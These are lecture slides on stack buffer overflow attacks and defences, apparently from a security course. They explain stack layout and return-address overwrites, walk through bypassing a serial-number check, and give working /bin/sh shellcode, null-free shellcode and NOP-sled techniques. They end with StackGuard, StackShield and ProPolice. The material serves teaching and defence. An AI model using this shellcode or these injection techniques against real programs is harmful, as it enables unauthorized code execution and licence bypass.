Attacks Using Stack Buffer Overflow Boxuan Gu
Reference The Art of Computer Virus Research and Defense (Symantec Press) (Paperback) By Peter Szor
Outline Background Stack buffer overflow Shell code How to prevent stack buffer overflow
Background Many vulnerability of applications are not from their specifications and protocols but from their implementations Weak implementation of passwords Buffer Overflow (can be used to redirect the control flow of a program) race conditions bugs in permissions
Background- Buffer overflow Typical Attack Scenario: Users enter data into a Web form Web form is sent to server Server writes data to buffer, without checking length of input data Data overflows from buffer Sometimes, overflow can enable an attack Web form attack could be carried out by anyone with an Internet connection
Background- layout of the Virtual Space of a Process The layout of the virtual space of a process in Linux
Cont. Code and data consist of instructions and initialized, uninitialized global and static data respectively; Runtime heap is used for dynamically allocated memory(malloc()); The stack is used whenever a function call is made.
Layout Of Stack Grows from high-end address to low-end address (buffer grows from low-end address to high-end address); Return Address- When a function returns, the instructions pointed by it will be executed; Stack Frame pointer(esp)- is used to reference to local variables and function parameters.
Example int cal(int a, int b) { int c; c = a + b; return c; } int main () { int d; d = cal(1, 2); printf("%d\n", d); return; } Stack high-end address low-end address b(2) a(1) ret addr(0x ) previous ebp c esp ebp
0x :lea 0x4(%esp),%ecx 0x :and $0xfffffff0,%esp 0x b :pushl -0x4(%ecx) 0x e :push %ebp 0x f :mov %esp,%ebp 0x :push %ecx 0x :sub $0x24,%esp 0x :movl $0x2,0x4(%esp) ; pass parameter 0x d :movl $0x1,(%esp) ; pass parameter 0x :call 0x80481f0 0x :mov %eax,-0x8(%ebp) 0x c :mov -0x8(%ebp),%eax 0x f :mov %eax,0x4(%esp) 0x :movl $0x80a0c88,(%esp) 0x a :call 0x8048c40 0x f :add $0x24,%esp 0x :pop %ecx 0x :pop %ebp 0x :lea -0x4(%ecx),%esp 0x :ret Dump of assembler code for function main:
Dump of assembler code for function cal: 0x080481f0 :push %ebp 0x080481f1 :mov %esp,%ebp 0x080481f3 :sub $0x10,%esp ; reserve 16 bytes for local variables in stack 0x080481f6 :mov 0xc(%ebp),%eax 0x080481f9 :add 0x8(%ebp),%eax 0x080481fc :mov %eax,-0x4(%ebp) 0x080481ff :mov -0x4(%ebp),%eax 0x :leave 0x :ret
Layout of Heap Global variables Static variables Dynamically allocated memory
Stack Buffer Overflow A buffer overflow occurs when too much data is put into the buffer; C language and its derivatives(C++) offer many ways to put more data than anticipated into a buffer;
Example Int bof() { char buffer[8]; // an 8 bytes buffer which is in the stack strcpy(“buffer, “AAAAAAAAAAAAAAAAAAA””); // copy 20 bytes into buffer // this will cause to the content of “ret” to be overwritten; // namely, the return address will be 0x (AAAA) return 1; } int main () { bof(); // call bof printf(“end\n”); // will never be executed; return 1; } AAAA AAAA (previous EBP) AAAA (RET->printf()) AAAA ESP EBP
Basic Idea of the Attack using stack buffer overflow Stack grows High address Low address TOP of Stack Attack Code Local variable (buffer) RET String grows Inject malicious code into the virtual space of a process; Modify the content of RET to redirect the execution flow to the malicious code.
Example Program asks for a serial number that attacker does not know Attacker also does not have source code Attacker does have the executable (exe) Program quits on incorrect serial number
Cont. Note that 0x41 is “A” Looks like ret overwritten by 2 bytes! I think the stack is overwitten by 3 bytes. By trial and error, attacker discovers an apparent buffer overflow
Cont. The goal is to exploit a buffer overflow so that the execution flow can be re-directed to 0x
Cont. Find that is ” in ASCII ('\0' is 00) Byte order is reversed? Why? X86 processors are “little-endian”
Cont. Reverse the byte order to “ ” (\x34\x10\x40\x00) and… Success! We’ve bypassed serial number check by exploiting a buffer overflow Overwrote the return address on the stack
Example-Create a shell char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; int main(){ char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); exit(0); } Shellcode can be looked as a sequence of binary instructions; The purpose of this shellcode is to create a command shell in linux. It can be used to create a shell with root privilege.
Cont. void sh() { int *return; return = (int *)&return + 2; // let ret point to the unit containing the return address (*return) = (int)shellcode; // let the return address point to the shellcode (shell code to create a shell) } int main() { sh(); printf("main end :)\n"); return; }
Cont. (gdb) disas sh Dump of assembler code for function sh: 0x :push %ebp 0x :mov %esp,%ebp 0x b :sub $0x10,%esp 0x e :lea -0x4(%ebp),%eax 0x :add $0x8,%eax 0x :mov %eax,- 0x4(%ebp) 0x :mov - 0x4(%ebp),%edx 0x a :mov $0x80bd6a0,%eax 0x f :mov %eax,(%edx) 0x :leave 0x :ret Previous ebp return RET
Three issues for injecting codes How to find a location in the stack to inject malicious code? How to generate a shellcode (Attack Code)? How to redirect the execution flow to the shellcode? If using stack buffer overflow, the content of memory unit storing return address should be modified. The injected payload should be long enough to do overwriting.
How to find a location to inject code If using stack buffer overflow, we might need to locate the stack of a function. Then we need to determine the offset from the bottom or the top of stack to inject the shell code We can use the following code to locate a stack: unsigned long find_start(void) { __asm__("movl %esp, %eax"); } unsigned long find_end(void) { __asm__("movl %ebp, %eax"); }
Cont. unsigned long find_start(void) { __asm__("movl %esp, %eax"); } unsigned long find_end(void) { __asm__("movl %ebp, %eax"); } int main() { printf("0x%x\n",find_start()); printf("0x%x\n",find_end()); }
Shell code Shellcode is defined as a set of instructions which is injected and then is executed by an exploited program; Shellcode is used to directly manipulate registers and the function of a program; Most of shellcodes use system call to do malicious behaviors; System calls is a set of functions which allow you to access operating system-specific functions such as getting input, producing output, exiting a process;
How to execute a system call in Linux? Use libc wrappers Ex: read, write etc; Works indirectly with assembly code to execute system calls; Directly use assembly code System call via software interrupts, for example int 0x80; In Linux, a shell code uses int 0x80 to raise system calls.
The process of executing a system call The specific system call is loaded into EAX; Arguments to the system call function are placed in other registers; The Instruction int 0x80 is executed; The CPU switches to Kernel mode; The system call function is executed. Example: main() { exit(0); }
Cont. gcc -g -static -o exit exit.c gdb exit Arlington:/home/src/shellcodes/code/ch03# gdb exit GNU gdb debian Copyright (C) 2007 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1". (gdb) disas _exit Dump of assembler code for function _exit: 0x0804df4c :mov 0x4(%esp),%ebx 0x0804df50 :mov $0xfc,%eax 0x0804df55 :int $0x80 0x0804df57 :mov $0x1,%eax 0x0804df5c :int $0x80 0x0804df5e :hlt End of assembler dump.
Write a shell code for exit() The shell code should do the following: Store the value of 0 into EBX; Store the value of 1 into EAX; Execute int 0x80 instruction
Cont. Section.text global _start _start: mov ebx, 0 mov eax, 1 int 0x80 First, we write ASM codes (exit.asm) as follows:
Cont. Arlington:/home/src/shellcodes/# nasm -f elf exit.asm Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o Arlington:/home/src/shellcodes/# objdump -d exit_1 exit_1: file format elf32-i386 Disassembly of section.text: : :bb mov $0x0,%ebx :b mov $0x1,%eax a:cd 80 int $0x80 Red words can be used as the shell code.
Cont. char shellcode[] = "\xbb\x00\x00\x00\x00" "\xb8\x01\x00\x00\x00" "\xcd\x80"; int main() { int *return; return = (int *)&return + 2; (*return) = (int)shellcode; }
Injectable Shellcode Null (\x00) will cause shellcode to fail when injected into a character array because \x00 is used to terminate strings; Injectable shellcode can't contain \x00; shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" is not an injectable shellcode; How to remove \x00? Use “xor ebx, ebx” to replace “mov ebx, 0” Use “mov al, 1 ” to replace “mov eax, 1”
Cont. bb mov $0x0,%ebx b mov $0x1,%eax cd 80 int $0x80 31 db xor %ebx, %ebx b0 01 mov $0x1,%al cd 80 int 0x80 shellcode[]=”\x31\xdb\xb0\x01\xcd\x80” After the transformation, the code is changed to :
Questions What is a stack frame? What is a return address? Can we inject shellcodes into any area of the address spaces of processes?
A framework for injectable shellcode Jmp short GotoCall shellcode: pop esi // esi will contain the address of '/bin/sh' GotoCall: Call shellcode // GetPC code Db '/bin/sh'
GetPC Code Call fsave/fstenv Can be used to get the address of last FPU instruction fldz fnstenv [esp-12] pop ecx add cl, 10 nop ECX will hold the address of the EIP.
An Example section.text global _start _start: jmp short GotoCall shellcode: pop esi xor eax, eax mov byte [esi + 7], al lea ebx, [esi] mov long [esi + 8], ebx mov long [esi + 12], eax mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 8] lea edx, [esi + 12] int 0x80 GotoCall: Call shellcode // GetPC Code db '/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters for system calls
NOP Sled Determining the correct offset for injecting code is not easy; NOP (non operation) sled can be used to increase the number of potential offsets; Generally, we can fill in the beginning of shellcode with NOPs. The opcode for NOP is 0x90 EX: shellcode[]=”\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80” Some FPU, SSE, MMX instructions can also be used as sled.
Summary of Launching An Attack Find a buffer overflow that can be used to redirect the control flow of the victim program Stack Buffer Overflow Heap Buffer Overflow Inject a segment of malicious shellcode
How to prevent stack buffer overflow? Stack Guard In a stack, a canary word is placed after return address whenever a function is called; The canary will be checked before the function returns. If value of canary is changed, then it indicates an malicious behavior. 6. Unix Stack Frame Arguments Old Base Pointer Return Address Local Variables Lower address Higher address Canary Value
Cont. Canary can still be intact if the attacker overwrites it with the correct value Solution – use “random canary” value Use “terminator canary” – consists of all string terminator sequences – NULL, ‘\r’, ‘\n’, -1… Attacker can still point to the ‘return address’ and change it, without worrying about the canary This is a short-coming of StackGuard Can be dealt by XORing the canary value and ‘return address’ to detect if ‘return address’ has changed
Stack Shield. Stack Shield Copy RET address into an unoverflowable memory region; The values of two RET addresses will be compared before a function returns; If the values are different, then an malicious exploitation occurs; Needs another stack-like data structure to maintain RET addresses.
ProPolice Perhaps most sophisticated compiler protection Rearrange local variables such that char buffers always are allocated at bottom addresses ( top of the stack), and are guarded by a Guard Value Does not work fine with small buffers – somewhat unstable 7. Unix Stack Frame Arguments Old Base Pointer Return Address Local Variables and Pointers Lower address Higher address Guard Value Local char buffers
Cont. Non-Executable stack; Return-to-libc exploitation might occur Randomization.